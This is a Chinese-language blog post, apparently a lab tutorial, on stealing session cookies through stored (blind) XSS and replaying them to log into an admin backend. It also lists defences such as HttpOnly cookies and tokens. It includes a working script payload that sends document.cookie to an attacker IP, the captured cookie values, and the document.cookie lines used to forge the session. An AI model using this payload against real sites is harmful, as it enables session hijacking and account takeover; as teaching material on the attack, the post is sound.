XSS 攻防案例

最新推荐文章于 2024-06-01 13:14:29 发布
最新推荐文章于 2024-06-01 13:14:29 发布
阅读量41 收藏
点赞数
分类专栏: # XSS 文章标签: xss 前端 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134320303
版权

XSS 攻防案例

固定会话

原理

​ 用户会话令牌利用Cookie 来实现的,Cookie 是存储在浏览器端的一小段文本,相当于身份证,会有窃取和欺骗的风险。

​ 可以利用XSS 攻击窃取到浏览器里的Cookie 信息。

​ 由于XXS 触发需要浏览器客户端用户(受害者)参与,攻击者不清楚何时何地会触发漏洞,这个过程一般被成为XSS 盲打。

窃读 Cookie

username=admin;userid=1;PHPSESSID=b09m2i6ppthmqqg26no26co6m3

欺骗

document.cookie = 'username=admin';
document.cookie = 'userid=1';
document.cookie = 'PHPSESSID=b09m2i6ppthmqqg26no26co6m3';

影响

  • 黑客可以利用Cookie 信息,也就是身份凭据,登录后台;
  • 即使管理员注销登录,会话依然有效;
  • 即使管理员修改了密码,会话依然有效。

防御

  • 根据实际情况采用“单点登录”;
  • 采用Session 机制;
  • 设置token 值;
  • 对Cookie 数据,设置HttpOnly 属性;

固定会话攻击实例/XSS盲打

攻击代码

原始代码

<script>document.write('<img src="http://10.9.47.120/'+document.cookie+'">');</script>

引号和分号需要进行转义

<script>document.write(\'<img src=\"http://10.9.47.120/\'+document.cookie+\'\">\')\;</script>

攻击原理

  • 当受害者浏览器加载包含这段代码的页面时,JavaScript 代码会执行。

  • JavaScript 会动态地创建一个<img>标签,并将其添加到页面中。

  • <img>标签的src属性指向了http://10.9.47.120/,后面紧跟着用户的 cookie 信息document.cookie

  • 浏览器会尝试加载这个图像,实际上是向http://10.9.47.120/发送了一个 GET 请求,其中包含了用户的 cookie 信息。

  • http://10.9.47.120/服务器,会记录或利用这些 cookie 信息

image-20231109132944510

攻击实施

攻击者上传 XSS 代码,并开启 http server 服务监听

image-20231109131523367

image-20231109133235267

受害者访问包含 XSS 代码的页面

image-20231109131625684

攻击者监听到包含受害者 Cookie 的请求

username=admin;%20userid=1;%20PHPSESSID=o81a755q490343a4cf6bgbjb91

image-20231109131656535

伪造登录

document.cookie = 'username=admin';
document.cookie = 'userid=1';
document.cookie = 'HPSESSID=o81a755q490343a4cf6bgbjb91';

image-20231109133749083

cookie 中有了伪造的信息,此时访问后台,无需验证即可登录

image-20231109133836422

image-20231109133921764

gjl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Xss Scan tool
05-25
Xss Scan,一款可以安装在burpsuite的插件,用于xss漏洞的扫描。 专业 好用
springboot整合XSS
03-20
springboot 整合预防xss攻击
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
XSS攻防手册
12-30
XSS 攻击与防御手册 无聊看看 只想弄个积分 不用搞了吧
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
php xss 实例,XSS攻防实例
weixin_29064103的博客
03-29 324
这篇是继上篇XSS跨站脚本攻击的后篇1、XSS攻击实例分析例1、简单XSS攻击留言类,简单注入javascript有个表单域:1、假若用户填写数据为:alert('foolish!')(或者)2、提交后将会弹出一个foolish警告窗口,接着将数据存入数据库3、等到别的客户端请求这个留言的时候,将数据取出显示留言时将执行攻击代码,将会显示一个foolish警告窗口。例2、盗取cookie2、tes...
XSS攻防实战
troy
09-10 664
XSS 的全称叫跨站脚本攻击(Cross Site Scripting),攻击出现的原因一般是因为 Web 程序对用户的输入过滤不足导致的一种漏洞,攻击者可以把恶意的脚本代码注入到网页之中,当其他用户浏览时就会执行其中的恶意代码,对受害者产生各种攻击。XSS 一般分为三种类型: 反射型 存储型 DOM型 反射型 XSS 攻防实战 反射型 XSS 攻击的恶意脚本并没有被存储到后端数据库中,而是诱导用户点击某个精心拼接的恶意链接,从而达到攻击的目的。 攻击案例 一个常见的场景是用户在某电影网站搜索,假如
Web前端安全系列之:XSS攻防及Vue防御(万字长文)
绝对零度的博客
10-20 9120
Web 攻击技术的发展也可以分为几个阶段。在Web 1.0时代,人们更多的是关注服务器端动态脚本的安全问题,比如将一个可执行脚本(俗称webshell)上传到服务器上,从而获得权限。后续有出现了SQL注入,SQL注入的出现是Web安全史上的一个里程碑,SQL注入漏洞至今仍然是Web安全领域中的一个重要组成部分。再后续另一个里程碑的安全问题问世–XSS(跨站脚本攻击)。伴随着Web 2.0的兴起,XSS、CSRF等攻击已经变得更为强大。Web攻击的思路也从服务器端转向了客户端,转向了浏览器和用户。
XSS攻防实战(附JS源码)
我本可以容忍阳光,如果我不曾见过太阳,然而阳光已使我荒凉,成为更新的荒凉。
09-07 975
授权转载自:乔珂力https://juejin.im/post/6867184627393265677之前写过两篇文章分别介绍了 Cookie :https://juejin.im/p...
Web前端安全系列之:XSS攻防
javagty6778的博客
03-03 132
Web` 攻击技术的发展也可以分为几个阶段。在 `Web 1.0` 时代,人们更多的是关注服务器端动态脚本的安全问题,比如将一个可执行脚本(俗称 `webshell`)上传到服务器上,从而获得权限。后续有出现了`SQL`注入,`SQL`注入的出现是`Web`安全史上的一个里程碑,`SQL`注入漏洞至今仍然是`Web`安全领域中的一个重要组成部分。再后续另一个里程碑的安全问题问世--`XSS`(跨站脚本攻击)。伴随着 `Web 2.0` 的兴起,`XSS`、`CSRF` 等攻击已经变得更为强大。
XSS漏洞检测和利用
2301_80127209的博客
04-25 729
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞。
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
热门推荐
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSSXSS靶场9道题目、如何防御XSS。希望您喜欢~
XSS 跨站点脚本漏洞详解
一个努力学习网安的小牛马
11-09 323
xss攻击手法以及绕过防御
WEB攻防-通用漏洞&XSS跨站-DOM&存储案例&工具
m0_65336233的博客
10-13 444
WEB攻防-通用漏洞&XSS跨站-DOM&存储案例&工具
【杂记-浅谈XSS跨站脚本攻击】
叫我小虎就行了的博客
05-31 616
【杂记-浅谈XSS跨站脚本攻击】
xss靶场之xss.haozi
最新发布
weixin_46954909的博客
06-01 555
这题显而易见的是括号不能使用了,我们的办法是替代法和进行编码,使用`来替代()或者使用编码的方式来替代掉括号,但要注意的是,script不能解析编码,所以script标签不能用编码的方式。这题没什么好说的,就是闭合+注释,搭配上script语句就可以了,虽然将&,’”<>/\都编码了,但是这就是典型的骗自己,因为即时编码了,但在img标签里也是能解析的,所以相当于徒劳。这题我们观察到直接输入,他是在input语句的属性值中,无法执行我们的js语句,所以我们的思路也是直接闭合掉语句,执行js语句。
记录一次前端页面崩溃的产生及处理
weixin_51123079的博客
05-30 510
记录一次前端页面崩溃的产生及处理
前端开发记录
qq_25806839的博客
05-31 165
【代码】前端开发记录。
XSS的应用场景和案例
03-09
XSS 的应用场景和案例包括但不限于:窃取用户的 Cookie、密码等敏感信息,篡改网页内容,进行钓鱼攻击,控制用户浏览器等。其中,最常见的 XSS 攻击是通过在网站中注入恶意脚本,使得用户在访问该网站时执行该脚本,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值